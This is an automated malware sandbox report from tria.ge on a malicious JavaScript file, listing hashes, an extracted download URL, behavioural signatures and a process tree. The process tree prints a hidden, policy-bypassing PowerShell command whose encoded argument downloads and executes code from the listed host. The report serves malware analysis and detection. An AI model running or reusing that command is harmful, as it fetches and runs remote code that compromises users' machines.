Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
10/01/2024, 17:58
Static task
static1
Behavioral task
behavioral1
Sample
513ac12272917745a725880dfee369c1.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
513ac12272917745a725880dfee369c1.js
Resource
win10v2004-20231222-en
General
-
Target
513ac12272917745a725880dfee369c1.js
-
Size
158KB
-
MD5
513ac12272917745a725880dfee369c1
-
SHA1
aca456b70fd34389033f4317662c420f9ee29d65
-
SHA256
9c27f1cc68c8c395a24b29ed3ae7813817ad2d7c796e4e9be8629b24a9fd6096
-
SHA512
ee96a526fe0c093eee7cb6aae918dab60d5abca178b5852fdff374c1d1ac2f9b8dbd7c8cff08cb69268ad52dc80cdaefe161e5e0374bfa25297b944f0ba831a9
-
SSDEEP
3072:t4PcCepny+hQVqJqqALYy3D9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWlk:k6WlqziD9Ry9RuXqW4SzUHmLKeMMU7Gb
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2820 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2820 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2508 wrote to memory of 2720 2508 wscript.exe 28 PID 2508 wrote to memory of 2720 2508 wscript.exe 28 PID 2508 wrote to memory of 2720 2508 wscript.exe 28 PID 2720 wrote to memory of 2820 2720 cmd.exe 30 PID 2720 wrote to memory of 2820 2720 cmd.exe 30 PID 2720 wrote to memory of 2820 2720 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\513ac12272917745a725880dfee369c1.js1⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-